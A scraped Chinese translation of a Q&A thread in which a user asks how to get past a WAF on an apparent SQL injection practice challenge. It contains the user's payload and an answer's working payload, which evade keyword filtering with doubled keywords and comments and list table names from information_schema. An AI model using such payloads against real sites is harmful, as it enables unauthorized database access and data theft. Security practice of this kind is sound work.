无法解决SQL注入WAF保护
Posted
技术标签:
【中文标题】无法解决SQL注入WAF保护【英文标题】:Cannot solve SQL injection WAF protection 【发布时间】:2017-11-19 23:16:24 【问题描述】:我必须做一个我无法解决的 SQL 注入!
我确实设法注入了这个,但没有得到表或列。
这是挑战: http://root0x00.altervista.org/sqli/level1.php?id=1
这是注入:
http://root0x00.altervista.org/sqli/level1.php?id=1%27and/**/1=2/**/uniunionon/**/selselectect/**/1,2,3,4,5%27(在/ /里面,我放了两个星号,但是被网站屏蔽了)
【问题讨论】:
sql注入只有一种解决方案——使用参数化查询。 我确实尝试了几个小时但没有成功,您有解决方案吗? *** 并不是为了解决你的作业。这个问题的答案对其他人没有帮助。 伙计,我确实明白了,但也许会?我亲自寻找这个挑战的答案,我确信有人会或确实试图找到一些答案。 【参考方案1】:http://root0x00.altervista.org/sqli/level1.php?id=1'and(false)uniUNIONon//selSELECTect//1,2,3,4,group_concat(table_name)//from//information_schema。表//where//table_schema=database()AND'zix'='zix 这是另一个论坛的答案:)如果有人也在寻找。 记得在 / / 之间添加 2 astreik
【讨论】:
以上是关于无法解决SQL注入WAF保护的主要内容,如果未能解决你的问题,请参考以下文章